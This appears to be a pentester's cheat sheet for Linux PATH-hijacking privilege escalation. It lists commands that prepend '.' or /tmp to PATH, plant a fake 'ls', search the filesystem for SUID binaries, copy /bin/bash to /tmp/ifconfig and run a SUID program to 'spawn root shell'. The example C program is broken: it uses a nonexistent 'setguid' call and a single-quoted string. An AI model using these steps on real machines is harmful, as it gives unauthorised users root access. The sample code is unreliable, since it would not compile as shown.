path-abuse

Check PATH variable

echo $PATH
env | grep PATH

Example: Create a script in a PATH directory (requires write access)

# echo 'echo "PATH ABUSE!!"' > /usr/local/bin/mycommand
# chmod +x /usr/local/bin/mycommand
# mycommand

Modify PATH (be cautious, this can break things)

PATH=.:$PATH
export PATH
echo $PATH

Example: Create a malicious script and execute it

# echo 'echo "PATH ABUSE!!"' > ls
# chmod +x ls
# ls

---

---

Look for SUID(4000) binary

find / -perm -u=s -type f 2>/dev/null

• If you found any custom binary with SUID permission set and calling a system command (ifconfig, ps, ls).

• You can copy "bash" binary to a folder and add entry to $PATH, and run the original custom binary.

• Path look up starts from left to right.

E.g., suppose /tmp/shell.c content

#include<unistd.h>
void main(){
setuid(0);
setguid(0);
system('ifconfig');}

Abuse

cp /bin/bash /tmp/ifconfig

export PATH=.:${PATH} && echo $PATH

		                 OR

export PATH=/tmp:${PATH} && echo $PATH

spawn root shell

/tmp/shell